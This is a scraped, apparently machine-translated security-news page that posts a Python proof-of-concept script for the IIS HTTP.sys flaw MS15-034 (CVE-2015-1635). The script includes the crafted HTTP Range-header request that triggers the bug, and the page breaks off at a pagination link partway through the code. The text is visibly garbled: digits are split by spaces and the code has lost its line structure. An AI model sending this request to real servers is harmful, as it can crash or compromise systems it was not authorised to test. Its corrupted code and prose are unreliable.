MS15-0 3 4 IIS 7.0 HTTP.sys a remote code execution vulnerability(CVE-2 0 1 5-1 6 3 5) POC-vulnerability warning-the black bar safety net

2016-10-17T00:00:00
ID MYHACK58:62201680262
Type myhack58
Reporter 佚名
Modified 2016-10-17T00:00:00

Description

Detection script: Python----beebeeto http://www.beebeeto.com/pdb/poc-2015-0081/

!/ usr/bin/env python

coding=utf-8

""" Site: http://www.beebeeto.com/ Framework: https://github.com/n0tr00t/Beebeeto-framework """ import socket import random import urlparse from baseframe import BaseFrame class MyPoc(BaseFrame): poc_info = {

poc related information

'poc': { 'id': 'poc-2 0 1 5-0 0 8 1', 'name': 'IIS 7.0 HTTP.sys a remote code execution vulnerability(CVE-2 0 1 5-1 6 3 5) POC', 'author': 'user1018', 'create_date': '2015-04-15', },

Protocol-related information

'protocol': { 'name': 'http', 'port': [8 0], 'layer4_protocol': ['tcp'], },

Vulnerability related information

'vul': { 'app_name': 'IIS', 'vul_version': ['7.0'], 'type': 'Code Execution', 'tag': ['IIS7. 0 vulnerability', 'HTTP. sys exploits', 'CVE-2 0 1 5-1 6 3 5'], 'desc': "' Scope of impact: Windows 7 Windows 8 Windows server 2 0 0 8 Windows server 2 0 1 2 A remote code execution vulnerability exists in the HTTP Protocol stack (HTTP.sys), when the HTTP.sys not correct parsing specially crafted HTTP request Will lead to this vulnerability. Successful exploitation of this vulnerability an attacker can be in the system account context in the execution of arbitrary code. To exploit this vulnerability, an attacker must be specially crafted HTTP requests sent to an affected system. By modifying the Windows HTTP stack processing Request, install update can fix this vulnerability. "', 'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx', 'http://bobao.360.cn/news/detail/1435.html'], }, } @classmethod def verify(cls, args): target = args['options']['target'] if urlparse. urlparse(target). netloc == ": ipAddr = urlparse. urlparse(target). path else: ipAddr = socket. gethostbyname(urlparse. urlparse(target). netloc) hexAllFfff = "1 8 4 4 6 7 4 4 0 7 3 7 0 9 5 5 1 6 1 5" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

[1] [2] [3] next